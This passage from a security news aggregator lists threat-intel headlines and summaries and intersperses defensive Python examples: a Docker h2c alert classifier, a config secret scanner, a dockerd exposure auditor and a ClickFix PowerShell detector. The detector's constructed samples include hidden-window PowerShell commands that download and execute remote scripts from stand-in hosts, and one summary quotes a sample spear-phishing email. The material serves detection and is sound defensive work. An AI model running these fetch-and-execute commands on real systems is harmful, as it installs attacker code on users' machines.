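CONSTRUCTED_PRIOR_KNOWLEDGE = H2_PREFACE + b"\x00\x00\x00\x04\x00\x00\x00\x00\x00"
CONSTRUCTED_PLAIN = b"GET /containers/json HTTP/1.1\r\nHost: 198.51.100.20:2375\r\n\r\n"

if __name__ == "__main__":
    samples = [(CONSTRUCTED_UPGRADE, 2375), (CONSTRUCTED_PRIOR_KNOWLEDGE, 2375), (CONSTRUCTED_PLAIN, 2375)]
    for kind, target in docker_h2c_alerts(samples):
        print("h2c to Docker API:", kind, target)
```

The practical point for defenders of a Docker host is the second branch: a sensor that only parses HTTP/1.1 request lines will classify a prior-knowledge h2c session as "unknown" and never see a URL, which is exactly the gap the quoted evasion relies on. Exposing the remote API on 2375 without TLS and client certificates is the precondition for the attack; the classifier is for finding where that exposure is already being used.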
Bleeping Computer (American magazine)
Exploit released for new Windows Server "WinReg" NTLM Relay attack
Proof-of-concept exploit code is now public for a vulnerability in Microsoft's Remote Registry client that could be used to take control of a Windows domain by downgrading the security of the authentication process. [...]
2024-10-22T13:26:01+00:00 https://www.bleepingcomputer.com/news/security/exploit-released-for-new-windows-server-winreg-ntlm-relay-attack/ www.secnews.physaphae.fr/article.php?IdArticle=8601361 False Threat None 3.0000000000000000

Zataz (French security magazine)
To protect Active Directory, neutralize the threats tied to privilege abuse and privilege escalation
2024-10-22T13:05:12+00:00 https://www.zataz.com/pour-proteger-active-directory-neutralisez-les-menaces-liees-a-labus-et-a-lelevation-des-privileges/ www.secnews.physaphae.fr/article.php?IdArticle=8601309 False Ransomware,Threat None 2.0000000000000000

Fortinet (security hardware vendor)
Managing Security Operations in a Complex Environment
A power grid operator has deployed a Fortinet SecOps solution to protect against zero-day attacks, converge IT/OT security, and centralize system management.
2024-10-22T13:00:00+00:00 https://www.fortinet.com/blog/customer-stories/managing-security-operations-in-a-complex-environment www.secnews.physaphae.fr/article.php?IdArticle=8601314 False Vulnerability,Threat,Industrial None 3.0000000000000000

The Hacker News (a hacking news blog, surprisingly enough)
CISA Adds ScienceLogic SL1 Vulnerability to Exploited Catalog After Active Zero-Day Attack
The U.S. Cybersecurity and Infrastructure Security Agency (CISA) on Monday added a critical security flaw impacting ScienceLogic SL1 to its Known Exploited Vulnerabilities (KEV) catalog, following reports of active exploitation as a zero-day. The vulnerability in question, tracked as CVE-2024-9537 (CVSS v4 score: 9.3), refers to a bug involving an unspecified third-party component that could [...]
2024-10-22T10:17:00+00:00 https://thehackernews.com/2024/10/cisa-adds-sciencelogic-sl1.html www.secnews.physaphae.fr/article.php?IdArticle=8601268 False Vulnerability,Threat None 2.0000000000000000

Global Security Mag (French news site)
Disastrous cyberattacks show organisations need to be more proactive in defence, says Oxylabs
Threat intelligence can help identify a threat actor's motives, targets, and behaviour, all while isolating threats before causing harm. - Special Reports
2024-10-22T09:59:06+00:00 https://www.globalsecuritymag.fr/disastrous-cyberattacks-show-organisations-need-to-be-more-proactive-in-defence.html www.secnews.physaphae.fr/article.php?IdArticle=8601289 False Threat None 2.0000000000000000
Netskope (American software company providing an IT security platform)
GitHub Comments from Legitimate Repositories Exploited to Deliver Remcos RAT
One of the most interesting findings of our Netskope Threat Labs Report: Insurance 2024 was the discovery that GitHub is the most popular application in terms of malware downloads for this specific vertical, surpassing Microsoft OneDrive, which is usually the undisputed leader of this unwelcome chart. An interesting confirmation of this peculiar trend of the […]
2024-10-21T20:57:28+00:00 https://www.netskope.com/blog/github-comments-from-legitimate-repositories-exploited-to-deliver-remcos-rat www.secnews.physaphae.fr/article.php?IdArticle=8601176 False Malware,Threat,Prediction None 2.0000000000000000
RiskIQ (cyber risk firm, now Microsoft)
Analysis of the Crypt Ghouls group: continuing the investigation into a series of attacks on Russia
2024-10-21T20:43:52+00:00 https://community.riskiq.com/article/f4c57994 www.secnews.physaphae.fr/article.php?IdArticle=8601196 False Ransomware,Tool,Threat None 2.0000000000000000

RiskIQ (cyber risk firm, now Microsoft)
China's Influence Ops | Twisting Tales of Volt Typhoon at Home and Abroad
2024-10-21T18:59:55+00:00 https://community.riskiq.com/article/16d42825 www.secnews.physaphae.fr/article.php?IdArticle=8601155 False Ransomware,Tool,Threat Guam 2.0000000000000000

RiskIQ (cyber risk firm, now Microsoft)
Bumblebee malware returns after recent law enforcement disruption
2024-10-21T18:57:24+00:00 https://community.riskiq.com/article/b382c0b6 www.secnews.physaphae.fr/article.php?IdArticle=8601156 False Ransomware,Spam,Malware,Tool,Threat,Legislation ChatGPT 2.0000000000000000

RiskIQ (cyber risk firm, now Microsoft)
Horns&Hooves Newsletter Delivers NetSupport RAT and BurnsRAT
2024-10-21T17:57:04+00:00 https://community.riskiq.com/article/3b8a71a8 www.secnews.physaphae.fr/article.php?IdArticle=8601136 False Ransomware,Malware,Tool,Threat,Medical None 2.0000000000000000

Zimperium (cyber risk firm for mobile)
Zimperium's Zero-Day Protection Against Water Makara Spear-Phishing Campaign
In this blog post we share Zimperium's Zero-Day Protection against the Water Makara spear-phishing campaign.
2024-10-21T17:48:26+00:00 https://www.zimperium.com/blog/zimperiums-zero-day-protection-against-water-makara-spear-phishing-campaign/ www.secnews.physaphae.fr/article.php?IdArticle=8601116 False Vulnerability,Threat None 3.0000000000000000
InfoSecurity Mag (InfoSecurity Magazine)
Stolen Access Tokens Lead to New Internet Archive Breach
A threat actor claimed to get hold of an exposed GitLab configuration file containing Zendesk API access tokens.
2024-10-21T15:30:00+00:00 https://www.infosecurity-magazine.com/news/stolen-tokens-internet-archive/ www.secnews.physaphae.fr/article.php?IdArticle=8601078 False Threat None 2.0000000000000000

The Register (British news site)
macOS HM Surf vuln might already be under exploit by major malware family
Like keeping your camera and microphone private? Patch up. In revealing details about a vulnerability that threatens the privacy of Apple fans, Microsoft urges all macOS users to update their systems. […]
2024-10-21T13:32:08+00:00 https://go.theregister.com/feed/www.theregister.com/2024/10/21/microsoft_macos_hm_surf/ www.secnews.physaphae.fr/article.php?IdArticle=8601013 False Malware,Vulnerability,Threat None 2.0000000000000000

RiskIQ (cyber risk firm, now Microsoft)
Weekly OSINT Highlights, 21 October 2024
2024-10-21T11:41:26+00:00 https://community.riskiq.com/article/02320e34 www.secnews.physaphae.fr/article.php?IdArticle=8600983 False Ransomware,Malware,Tool,Vulnerability,Threat,Cloud APT 38,APT 37,APT-C-17 2.0000000000000000

Checkpoint Research (security hardware vendor)
21st October – Threat Intelligence Report
For the latest discoveries in cyber research for the week of 21st October, please download our Threat Intelligence Bulletin. TOP ATTACKS AND BREACHES: Boston Children's Health Physicians, part of the Boston Children's Hospital network, suffered a data breach in September, exposing sensitive patient information, including Social Security numbers, medical records, and health insurance details. The […]
2024-10-21T10:13:48+00:00 https://research.checkpoint.com/2024/21st-october-threat-intelligence-report/ www.secnews.physaphae.fr/article.php?IdArticle=8600946 False Data Breach,Threat,Medical None 2.0000000000000000
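The InfoSecurity Magazine item above (Internet Archive) turns on an exposed GitLab configuration file that carried API access tokens. The scanner below is an added example written for this page; it is not code from InfoSecurity Magazine, the Internet Archive, GitLab or the aggregator. It flags two kinds of secret in configuration text: credentials with a documented fixed prefix (AWS access key IDs, GitHub personal access tokens, PEM private-key headers) and assignments whose key name suggests a credential and whose value has high Shannon entropy, while letting `${VAR}` template references and obvious placeholders pass. The sample configuration, its key names and the 3.5 bits-per-character threshold are constructed for illustration; no assumption is made about the format of real Zendesk tokens.

```python
"""Find credentials that should never sit in a committed configuration file.

Added example for this page; standalone, no network access.
"""
import math
import re
from dataclasses import dataclass

# Credential shapes with a documented, fixed prefix.
KNOWN_PATTERNS = {
    "aws_access_key_id": re.compile(r"\bAKIA[0-9A-Z]{16}\b"),
    "github_pat": re.compile(r"\bghp_[A-Za-z0-9]{36}\b"),
    "private_key_block": re.compile(r"-----BEGIN (?:RSA |EC |OPENSSH )?PRIVATE KEY-----"),
}

# key = value or key: value, where the key name suggests a credential.
ASSIGNMENT = re.compile(
    r"(?i)\b(?P<key>[a-z0-9_.-]*(?:token|secret|password|passwd|api[_-]?key)[a-z0-9_.-]*)"
    r"\s*[:=]\s*['\"]?(?P<value>[^'\"\s]{8,})['\"]?"
)

# Values that occupy a credential slot but hold no credential.
PLACEHOLDERS = {"changeme", "xxxxxxxx", "<redacted>", "null", "none", "example"}


def shannon_entropy(s: str) -> float:
    """Bits per character. Random base64/hex material scores well above 3.5;
    words and repeated characters score far lower."""
    if not s:
        return 0.0
    n = len(s)
    return -sum(c / n * math.log2(c / n) for c in (s.count(ch) for ch in set(s)))


def redact(value: str) -> str:
    """Keep enough of the value to locate it in the file, never enough to reuse it."""
    return f"{value[:4]}...{value[-2:]}" if len(value) > 8 else "***"


@dataclass
class Finding:
    line: int
    kind: str
    key: str
    redacted: str


def scan_config(text: str, entropy_threshold: float = 3.5) -> list[Finding]:
    """Return one Finding per suspected credential in a config file's text."""
    findings: list[Finding] = []
    for lineno, line in enumerate(text.splitlines(), start=1):
        stripped = line.strip()
        if not stripped or stripped.startswith("#"):
            continue
        matched_known = False
        for kind, pattern in KNOWN_PATTERNS.items():
            for m in pattern.finditer(line):
                findings.append(Finding(lineno, kind, "", redact(m.group(0))))
                matched_known = True
        if matched_known:
            continue
        m = ASSIGNMENT.search(line)
        if not m:
            continue
        value = m.group("value")
        # Template references (${VAR}) and placeholders are how the file should look.
        if value.startswith("${") or value.lower() in PLACEHOLDERS:
            continue
        if shannon_entropy(value) >= entropy_threshold:
            findings.append(Finding(lineno, "high_entropy_assignment", m.group("key"), redact(value)))
    return findings


# Constructed sample in the style of a YAML application config; not a real file.
SAMPLE_CONFIG = """\
# constructed sample, not a real configuration
production:
  zendesk_api_token: "ZxQ9mT3vK8pL2nR7sW4yB6dF1gH5jA0c"
  aws_access_key_id: AKIAIOSFODNN7EXAMPLE
  db_password: ${DB_PASSWORD}
  smtp_password: changeme
  log_level: info
"""

if __name__ == "__main__":
    for f in scan_config(SAMPLE_CONFIG):
        print(f"line {f.line}: {f.kind} {f.key} {f.redacted}")
```

Run as a pre-commit hook over tracked config files, the scan surfaces the two real problems in the sample (the literal API token and the AWS key ID) and stays quiet on the lines that resolve secrets from the environment, which is the shape the file should have had in the first place.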
AlienVault Lab Blog (AlienVault is a major defensive player in IOCs)
A Look at the Social Engineering Element of Spear Phishing Attacks
[...] phishing attacks that many of us have become accustomed to. That way, you can recognize and resist spear phishing attempts that leverage psychological triggers against you.
Anatomy of a Spear Phishing Hoax. Before analyzing the specifics of social engineering, let's level set on what defines a spear phishing attack.
- Highly targeted: Spear phishing targets specific individuals or organizations using personalization and context to improve credibility. This could be titles, familiar signatures, company details, projects worked on, etc.
- Appears legitimate: Spear phishers invest time in making emails and landing pages appear 100% authentic. They'll often use real logos, domains, and stolen data.
- Seeks sensitive data: The end goal is to get victims to give away credentials, bank details, trade secrets, or other sensitive information, or to install malware.
- Instills a sense of urgency/fear: Subject lines and content press emotional triggers related to urgency, curiosity, fear, and doubt to get quick clicks without deeper thought.
With that foundation set, let's examine how spear phishers socially engineer their attacks to exploit human vulnerabilities with frightening success.
#1: They Leverage the Human Desire to Be Helpful. Human beings have an innate desire to be perceived as helpful. When someone asks you for a favor, your first instinct is likely to want to say yes rather than second-guess them. Spear phishers exploit this trait by crafting emails that make requests sound reasonable and essential. Even just starting an email with "I hope you can help me with..." triggers a reciprocity bias that increases vulnerability to attack.
Let's take a look at an example:
Subject: URGENT Support Needed
Email body: "Hi Amanda, I'm reaching out because I need your help, please. I'm currently out of office and having issues accessing invoices. Do you mind sending me over the 2 most recent invoices we received? I need to send them out by end of day. Sorry for the urgent request! Please let me know. Thanks, Sarah"
This email pulls together four highly effective social engineering triggers:
- Politeness – Saying "please" and "thank you" fits social norms for seeking help.
- Sense of urgency – Creating a short deadline pressures quick action without deeper thought. [...]
2024-10-21T10:00:00+00:00 https://cybersecurity.att.com/blogs/security-essentials/a-look-at-the-social-engineering-element-of-spear-phishing-attacks www.secnews.physaphae.fr/article.php?IdArticle=8601075 False Spam,Malware,Vulnerability,Threat,Cloud,Technical None 2.0000000000000000

Dark Reading (InformationWeek branch)
DPRK Uses Microsoft Zero-Day in No-Click Toast Attacks
The "Code-on-Toast" supply chain cyberattacks by APT37 delivered data-stealing malware to users in South Korea who had enabled Toast pop-up ads.
2024-10-21T01:00:00+00:00 https://www.darkreading.com/vulnerabilities-threats/dprk-microsoft-zero-day-no-click-toast-attacks www.secnews.physaphae.fr/article.php?IdArticle=8600761 False Malware,Vulnerability,Threat APT 37 2.0000000000000000

TrendLabs Security (antivirus vendor)
Attackers Target Exposed Docker Remote API Servers With perfctl Malware
We observed an unknown threat actor abusing exposed Docker remote API servers to deploy the perfctl malware.
2024-10-21T00:00:00+00:00 https://www.trendmicro.com/en_us/research/24/j/attackers-target-exposed-docker-remote-api-servers-with-perfctl-.html www.secnews.physaphae.fr/article.php?IdArticle=8601042 False Malware,Threat None 2.0000000000000000

The Hacker News (a hacking news blog, surprisingly enough)
Hackers Exploit Roundcube Webmail XSS Vulnerability to Steal Login Credentials
Unknown threat actors have been observed attempting to exploit a now-patched security flaw in the open-source Roundcube webmail software as part of a phishing attack designed to steal user credentials. Russian cybersecurity company Positive Technologies said it discovered last month that an email was sent to an unspecified governmental organization located in one of the Commonwealth of [...]
2024-10-20T13:07:00+00:00 https://thehackernews.com/2024/10/hackers-exploit-roundcube-webmail-xss.html www.secnews.physaphae.fr/article.php?IdArticle=8600499 False Vulnerability,Threat None 2.0000000000000000

Global Security Mag (French news site)
Ransomware attacks are declining, but recovery after an attack is getting harder, Vade/Hornetsecurity survey reveals - Investigations
2024-10-19T19:51:10+00:00 https://www.globalsecuritymag.fr/les-attaques-par-ransomware-diminuent-mais-la-recuperation-apres-l-attaque.html www.secnews.physaphae.fr/article.php?IdArticle=8600279 False Ransomware,Threat None 2.0000000000000000

Global Security Mag (French news site)
Ivanti: October Patch Tuesday recap - Vulnerabilities
2024-10-19T19:43:53+00:00 https://www.globalsecuritymag.fr/ivanti-recapitulatif-du-patch-tuesday-d-octobre.html www.secnews.physaphae.fr/article.php?IdArticle=8600280 False Threat None 2.0000000000000000

The Hacker News (a hacking news blog, surprisingly enough)
Crypt Ghouls Targets Russian Firms with LockBit 3.0 and Babuk Ransomware Attacks
A nascent threat actor known as Crypt Ghouls has been linked to a set of cyber attacks targeting Russian businesses and government agencies with ransomware, with the twin goals of disrupting business operations and financial gain. "The group under review has a toolkit that includes utilities such as Mimikatz, XenAllPasswordPro, PingCastle, Localtonet, resocks, AnyDesk, PsExec, and others," [...]
2024-10-19T13:09:00+00:00 https://thehackernews.com/2024/10/crypt-ghouls-targets-russian-firms-with.html www.secnews.physaphae.fr/article.php?IdArticle=8600073 False Ransomware,Threat None 3.0000000000000000

ZD Net (IT magazine)
Southeast Asia reiterates pledge to collaborate amid growing cyber threats in AI era
ASEAN member states now have a physical CERT facility located in Singapore to exchange threat intel and best practices.
2024-10-19T03:00:15+00:00 https://www.zdnet.com/article/southeast-asia-reiterates-pledge-to-collaborate-amid-growing-cyber-threat-in-ai-era/#ftag=RSSbaffb68 www.secnews.physaphae.fr/article.php?IdArticle=8599990 False Threat None 2.0000000000000000

Dark Reading (InformationWeek branch)
MacOS Safari 'HM Surf' Exploit Exposes Camera, Mic, Browser Data
Microsoft researchers toyed with app permissions to uncover CVE-2024-44133, using it to access sensitive user data. Adware merchants may have as well.
2024-10-18T21:26:11+00:00 https://www.darkreading.com/vulnerabilities-threats/macos-safari-exploit-camera-mic-browser-data www.secnews.physaphae.fr/article.php?IdArticle=8599905 False Threat None 3.0000000000000000

RiskIQ (cyber risk firm, now Microsoft)
Malicious ads exploited Internet Explorer zero day to drop malware
2024-10-18T20:53:46+00:00 https://community.riskiq.com/article/d11b6766 www.secnews.physaphae.fr/article.php?IdArticle=8599904 False Malware,Vulnerability,Threat APT 37 3.0000000000000000

RiskIQ (cyber risk firm, now Microsoft)
Warning Against Phishing Emails Impersonating Major Korean Entertainment Agencies
2024-10-18T19:13:56+00:00 https://community.riskiq.com/article/2e683b12 www.secnews.physaphae.fr/article.php?IdArticle=8599884 True Ransomware,Spam,Malware,Tool,Threat None 2.0000000000000000

Dark Reading (InformationWeek branch)
CISOs: Throwing Cash at Tools Isn't Helping Detect Breaches
A survey shows three-quarters of CISOs are drowning in threat detections put out by a sprawling stack of tools, yet still lack the basic visibility necessary to identify breaches.
2024-10-18T18:47:52+00:00 https://www.darkreading.com/cloud-security/cisos-throwing-cash-tools-detect-breaches www.secnews.physaphae.fr/article.php?IdArticle=8599866 False Tool,Threat None 3.0000000000000000

RiskIQ (cyber risk firm, now Microsoft)
The Will of D: A Deep Dive into Divulge Stealer, Dedsec Stealer, and Duck Stealer
2024-10-18T17:12:34+00:00 https://community.riskiq.com/article/8096d1b3 www.secnews.physaphae.fr/article.php?IdArticle=8599844 True Ransomware,Spam,Malware,Tool,Threat None 3.0000000000000000

RiskIQ (cyber risk firm, now Microsoft)
Vietnamese Threat Actor's Multi-Layered Strategy on Digital Marketing Professionals
2024-10-18T16:43:16+00:00 https://community.riskiq.com/article/df7e4bc5 www.secnews.physaphae.fr/article.php?IdArticle=8599824 True Ransomware,Malware,Tool,Threat,Industrial None 3.0000000000000000

TaoSecurity (security blog)
Digital Offense Capabilities Are Currently Net Negative for the Security Ecosystem
Proposition: Digital offense capabilities are currently net negative for the security ecosystem. [0] The costs of improved digital offense currently outweigh the benefits. The legitimate benefits of digital offense accrue primarily to the security one percent (#securityonepercent), and to intelligence, military, and law enforcement agencies. The derived defensive benefits depend on the nature of the defender. The entire security ecosystem bears the costs, and in some cases even those who see tangible benefit may suffer costs exceeding those benefits.
The Reason: Limitations of scaling are the reason why digital offense capabilities are currently net negative. Consider the case of an actor developing a digital offense capability, and publishing it to the general public. From the target side, limitations on scaling prevent complete mitigation or remediation of the vulnerability. The situation is much different from the offense perspective. Any actor may leverage the offense capability against any Internet-connected target on the planet. The actor can scale that capability across the entire range of vulnerable or exposed targets.
The Three: Only three sets of actors are able to possibly leverage an offense capability for defensive purposes. First, the organization responsible for developing and maintaining the vulnerable or exposed asset can determine if there is a remedy for the new offense capability. (This is typically a "vendor," but could be a noncommercial entity. As a shorthand, I will use "vendor.") The vendor can try to develop and deploy a patch or mitigation method. Second, major consumers of the vulnerable or exposed asset can take similar steps, usually by implementing the vendor's patch or mitigation. Third, the security one percent can take some defensive measures, either by implementing the vendor's patch or mitigation, or by developing and acting upon detection and response processes. The combination of the actions by these three sets of actors will not completely remediate the digital offense capab[...]
2024-10-18T15:58:56+00:00 https://taosecurity.blogspot.com/2021/02/digital-offense-capabilities-are.html www.secnews.physaphae.fr/article.php?IdArticle=8599864 False Ransomware,Tool,Vulnerability,Threat,Legislation,Cloud,Technical None 2.0000000000000000

Netskope (American software company providing an IT security platform)
New Bumblebee Loader Infection Chain Signals Possible Resurgence
Summary: Bumblebee is a highly sophisticated downloader malware that cybercriminals use to gain access to corporate networks and deliver other payloads such as Cobalt Strike beacons and ransomware. The Google Threat Analysis Group first discovered the malware in March 2022 and named it Bumblebee based on a User-Agent string it used. The Netskope Threat Labs team […]
2024-10-18T15:29:40+00:00 https://www.netskope.com/blog/new-bumblebee-loader-infection-chain-signals-possible-resurgence www.secnews.physaphae.fr/article.php?IdArticle=8599783 False Ransomware,Malware,Threat None 3.0000000000000000
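The Trend Micro item above reports an unknown actor abusing exposed Docker remote API servers. Added here as an illustration, not Trend Micro's code or the aggregator's, is an audit of a dockerd configuration for the condition that makes that abuse possible: a tcp:// API listener without mutual TLS, which hands root-equivalent control of the host to anyone who can reach the port. The daemon.json contents and dockerd command line below are constructed. The flag names (-H/--host, --tlsverify) and JSON keys (hosts, tlsverify, tlscacert, tlscert, tlskey) are dockerd's documented ones, and 2375/2376 are the conventional plaintext and TLS ports.

```python
"""Audit a dockerd configuration for a remotely reachable, unauthenticated API.

Added example for this page; reads configuration text only and touches no daemon.
"""
import json
import shlex
from urllib.parse import urlparse

# Addresses that mean "every interface".
UNSPECIFIED = {"", "0.0.0.0", "::"}


def dockerd_hosts(daemon_json: str, dockerd_cmdline: str = "") -> tuple[list[str], bool]:
    """Collect API listeners and the client-cert requirement from both places dockerd
    accepts them: /etc/docker/daemon.json and the dockerd command line (systemd ExecStart)."""
    cfg = json.loads(daemon_json) if daemon_json.strip() else {}
    hosts = list(cfg.get("hosts", []))
    tlsverify = bool(cfg.get("tlsverify", False))

    argv = shlex.split(dockerd_cmdline)
    for i, arg in enumerate(argv):
        if arg in ("-H", "--host") and i + 1 < len(argv):
            hosts.append(argv[i + 1])
        elif arg.startswith("--host="):
            hosts.append(arg.split("=", 1)[1])
        elif arg in ("--tlsverify", "--tlsverify=true"):
            tlsverify = True
    return hosts, tlsverify


def audit_dockerd(daemon_json: str, dockerd_cmdline: str = "") -> list[str]:
    """Return findings as strings; an empty list means no TCP exposure problem."""
    hosts, tlsverify = dockerd_hosts(daemon_json, dockerd_cmdline)
    findings = []
    for h in hosts:
        u = urlparse(h)
        if u.scheme != "tcp":          # unix:// and fd:// are local-only
            continue
        where = f"tcp://{u.hostname or '0.0.0.0'}:{u.port}"
        if not tlsverify:
            # --tls alone encrypts but does not authenticate clients; only
            # --tlsverify requires a client certificate signed by tlscacert.
            findings.append(f"HIGH {where}: Docker API over TCP without tlsverify; "
                            "anyone who can reach the port has root-equivalent control of the host")
        if (u.hostname or "") in UNSPECIFIED:
            findings.append(f"MEDIUM {where}: listener bound to all interfaces")
        if u.port == 2375:
            findings.append(f"INFO {where}: 2375 is the conventional plaintext port and is mass-scanned")
    return findings


# Constructed configurations, not taken from any real host.
WEAK_DAEMON_JSON = '{"hosts": ["unix:///var/run/docker.sock", "tcp://0.0.0.0:2375"]}'

HARDENED_DAEMON_JSON = """{
  "hosts": ["unix:///var/run/docker.sock", "tcp://10.0.0.5:2376"],
  "tlsverify": true,
  "tlscacert": "/etc/docker/ca.pem",
  "tlscert": "/etc/docker/server-cert.pem",
  "tlskey": "/etc/docker/server-key.pem"
}"""

# The same exposure hidden in a systemd ExecStart line instead of the JSON file.
WEAK_CMDLINE = "/usr/bin/dockerd -H fd:// -H tcp://0.0.0.0:2375 --containerd=/run/containerd/containerd.sock"

if __name__ == "__main__":
    for label, js, cmd in (("weak json", WEAK_DAEMON_JSON, ""),
                           ("weak cmdline", "", WEAK_CMDLINE),
                           ("hardened", HARDENED_DAEMON_JSON, "")):
        print(label, audit_dockerd(js, cmd) or ["ok"])
```

Checking both sources matters: dockerd refuses to start when hosts are set in both places, so operators who hit that error usually move the -H flag to one of them, and an audit that reads only daemon.json misses the other. The hardened variant binds to a specific address, uses 2376, and requires a client certificate; a network-layer allow-list in front of it is still the right complement.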
The Hacker News (a hacking news blog, surprisingly enough)
Beware: Fake Google Meet Pages Deliver Infostealers in Ongoing ClickFix Campaign
Threat actors are leveraging fake Google Meet web pages as part of an ongoing malware campaign dubbed ClickFix to deliver infostealers targeting Windows and macOS systems. "This tactic involves displaying fake error messages in web browsers to deceive users into copying and executing a given malicious PowerShell code, finally infecting their systems," French cybersecurity company Sekoia said in [...]
2024-10-18T15:13:00+00:00 https://thehackernews.com/2024/10/beware-fake-google-meet-pages-deliver.html www.secnews.physaphae.fr/article.php?IdArticle=8599671 False Malware,Threat None 3.0000000000000000

Cybereason (vendor blog)
THREAT ANALYSIS: Beast Ransomware
2024-10-18T14:16:35+00:00 https://www.cybereason.com/blog/threat-analysis-beast-ransomware www.secnews.physaphae.fr/article.php?IdArticle=8599760 False Ransomware,Threat None 2.0000000000000000

Dark Reading (InformationWeek branch)
Supply Chain Cybersecurity Beyond Traditional Vendor Risk Management
Traditional practices are no longer sufficient in today's threat landscape. It's time for cybersecurity professionals to rethink their approach.
2024-10-18T14:00:00+00:00 https://www.darkreading.com/cyber-risk/supply-chain-cybersecurity-traditional-vendor-risk-management www.secnews.physaphae.fr/article.php?IdArticle=8599739 False Threat None 3.0000000000000000

Checkpoint (security hardware vendor)
A Closer Look at Q3 2024: 75% Surge in Cyber Attacks Worldwide
A Record Spike in Attacks: In Q3 2024, an average of 1,876 cyber attacks per organization was recorded, marking a 75% increase compared to the same period in 2023 and a 15% rise from the previous quarter. Industry-wise Breakdown: The Education/Research sector was the most targeted with 3,828 weekly attacks, followed by the Government/Military and Healthcare sectors, with 2,553 and 2,434 attacks, respectively. Regional Highlights: Africa faced the highest average of attacks at 3,370 per week (+90% YoY), while Europe and Latin America also saw significant increases. Ransomware: A Persistent Threat: Over 1,230 ransomware incidents were reported, with North America […]
2024-10-18T13:00:23+00:00 https://blog.checkpoint.com/research/a-closer-look-at-q3-2024-75-surge-in-cyber-attacks-worldwide/ www.secnews.physaphae.fr/article.php?IdArticle=8599714 False Ransomware,Threat,Medical None 3.0000000000000000
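The Hacker News item on ClickFix above describes fake browser error messages that get users to copy and run PowerShell themselves, so the first malicious process is launched by the victim rather than by an exploit. As an added example (not Sekoia's, The Hacker News' or the aggregator's code), the detection below scores process-creation events for that pattern: PowerShell started from an interactive parent, a hidden window, and an encoded or inline command that fetches and executes remote content; it decodes -EncodedCommand payloads so the indicators apply to what actually runs. The events are constructed telemetry in a Sysmon Event ID 1-like shape. The field names, the weights, the "explorer.exe or cmd.exe as interactive parent" heuristic and the threshold of 6 are assumptions to tune against your own data; the IP addresses come from the RFC 5737 documentation ranges.

```python
"""Score process-creation telemetry for ClickFix-style PowerShell launches.

Added example for this page; runs offline over constructed events.
"""
import base64
import re
from typing import Optional

# Weighted indicators matched against the command line and, when present, the
# decoded -EncodedCommand payload. Weights are assumptions to tune locally.
INDICATORS = [
    (re.compile(r"(?i)\b(iwr|irm|invoke-webrequest|invoke-restmethod|downloadstring|net\.webclient|start-bitstransfer)\b"), 3, "remote fetch"),
    (re.compile(r"(?i)\b(iex|invoke-expression)\b"), 3, "dynamic execution"),
    (re.compile(r"(?i)-(w|win|windowstyle)\s+hidden\b"), 1, "hidden window"),
    (re.compile(r"(?i)-(nop|noprofile)\b"), 1, "no profile"),
    (re.compile(r"(?i)-(e|ec|enc|encodedcommand)\s+[A-Za-z0-9+/=]{20,}"), 2, "encoded command"),
]
ENCODED_ARG = re.compile(r"(?i)-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]{20,})")

# ClickFix relies on the victim pasting into a Run dialog or a terminal, so the
# parent is an interactive shell rather than a service or scheduler (assumption).
INTERACTIVE_PARENTS = {"explorer.exe", "cmd.exe"}
POWERSHELL_IMAGES = {"powershell.exe", "pwsh.exe"}


def basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def decode_encoded_command(cmdline: str) -> Optional[str]:
    """-EncodedCommand takes base64 of UTF-16LE text; decode it so the indicators
    can see the real command rather than an opaque blob."""
    m = ENCODED_ARG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return None


def score_event(ev: dict) -> tuple[int, list[str], Optional[str]]:
    """Return (score, reasons, decoded_payload) for one process-creation event."""
    if basename(ev["image"]) not in POWERSHELL_IMAGES:
        return 0, [], None
    decoded = decode_encoded_command(ev["cmdline"])
    haystack = ev["cmdline"] + ("\n" + decoded if decoded else "")
    score, reasons = 0, []
    for pattern, weight, label in INDICATORS:
        if pattern.search(haystack):
            score += weight
            reasons.append(label)
    parent = basename(ev["parent_image"])
    if parent in INTERACTIVE_PARENTS:
        score += 2
        reasons.append(f"launched from {parent}")
    return score, reasons, decoded


def detect(events: list[dict], threshold: int = 6) -> list[dict]:
    """Events scoring at or above the threshold, highest score first."""
    alerts = []
    for ev in events:
        score, reasons, decoded = score_event(ev)
        if score >= threshold:
            alerts.append({"ts": ev["ts"], "host": ev["host"], "user": ev["user"],
                           "score": score, "reasons": reasons, "decoded": decoded,
                           "cmdline": ev["cmdline"]})
    return sorted(alerts, key=lambda a: a["score"], reverse=True)


# Constructed telemetry, no real hosts or users. 192.0.2.0/24 and 198.51.100.0/24
# are documentation ranges; the encoded payload is built here, not captured.
_PAYLOAD = "iex (irm http://192.0.2.1/meet.ps1)"
_ENCODED = base64.b64encode(_PAYLOAD.encode("utf-16le")).decode()
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"

SAMPLE_EVENTS = [
    {"ts": "2024-10-18T14:02:11Z", "host": "WS-0421", "user": r"CORP\amanda", "image": PS,
     "parent_image": r"C:\Windows\explorer.exe",
     "cmdline": f"powershell -w hidden -enc {_ENCODED}"},
    {"ts": "2024-10-18T14:07:40Z", "host": "WS-0117", "user": r"CORP\jlee", "image": PS,
     "parent_image": r"C:\Windows\explorer.exe",
     "cmdline": "powershell -w hidden -nop -c \"iex (iwr 'http://198.51.100.7/fix.txt')\""},
    {"ts": "2024-10-18T14:10:02Z", "host": "WS-0117", "user": r"CORP\jlee", "image": PS,
     "parent_image": r"C:\Windows\explorer.exe",
     "cmdline": "powershell -NoProfile -Command Get-Service"},
    {"ts": "2024-10-18T14:15:00Z", "host": "SRV-INV01", "user": "NT AUTHORITY\\SYSTEM", "image": PS,
     "parent_image": r"C:\Windows\System32\svchost.exe",
     "cmdline": r"powershell.exe -NoProfile -ExecutionPolicy Bypass -File C:\Scripts\inventory.ps1"},
]

if __name__ == "__main__":
    for a in detect(SAMPLE_EVENTS):
        print(a["host"], a["user"], a["score"], ", ".join(a["reasons"]))
        if a["decoded"]:
            print("  decoded:", a["decoded"])
```

Of the four constructed events only the two ClickFix-shaped launches cross the threshold; the interactive `Get-Service` and the scheduled inventory script score too low to page anyone. Baseline the weights against a week of your own PowerShell telemetry before turning this into an alert.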
Security Intelligence (American news site)
What's behind the 51% drop in ransomware attacks?
